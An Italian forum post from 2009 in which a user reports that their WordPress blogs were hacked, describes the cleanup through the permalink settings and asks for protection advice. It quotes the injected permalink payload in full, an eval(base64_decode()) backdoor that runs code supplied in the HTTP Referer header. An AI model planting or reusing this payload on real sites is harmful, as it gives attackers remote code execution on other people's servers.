Home > Commenti

Puoi iscriverti al feed RSS dei commenti di questa notizia per seguire la discussione.

Attacco ai siti Wordpress: è capitato anche a voi oggi?

di solotelcoemotori 159142 il 04 set 09, 10:42:33
Da ieri è in corso un attacco a diversi blog che utilizzano Wordpress. Io avevo un sito con una vecchia versione 2.6 e altri con 2.7 e sono stati attaccati indistintamente. Anche uno con la versione 2.8 è stato modificato.

In pratica, sfruttando non so quale bug, mi sono ritrovato i siti visibili ma non era più possibile accedere ai post perché era stata modificata la struttura dei link e aggiunta questa parte di codice EVAL: %&;({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Per far tornare tutto alla normalità, basta andare in impostazione dei permalink e togliere manualmente questo codice. Qualcuno sa come proteggersi da questo tipo di attacco?

Per aggiungere un commento effettua il Login.

© 1997 - 2012 MATRIX S.P.A. TUTTI I DIRITTI RISERVATI - P. IVA 11586340157